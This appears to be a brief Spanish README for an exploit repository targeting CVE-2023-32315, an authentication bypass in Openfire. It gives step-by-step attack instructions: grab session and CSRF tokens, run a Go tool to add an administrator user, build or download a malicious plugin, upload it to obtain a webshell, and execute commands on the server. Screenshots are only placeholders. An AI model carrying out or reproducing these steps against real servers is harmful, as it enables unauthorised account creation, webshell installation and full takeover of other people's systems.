
CVE-2023-32315(java7)
0x01 Obtener el JSESSIONID y csrftoken devueltos, construir el paquete de solicitud para añadir un usuario (reemplazar JSESSIONID, csrftoken) img.png
cd CVE-2023-32315-Openfire-Bypass/scan_all
go mod tidy
go run main.go -u http://openfire.com:9090
0x02 Compilar e instalar el plugin
mvn clean package
o Descargar el plugin desde releases
0x03 Subir el plugin img.png
0x04 Obtener webshell img.png 0x05 Ejecutar comandos img.png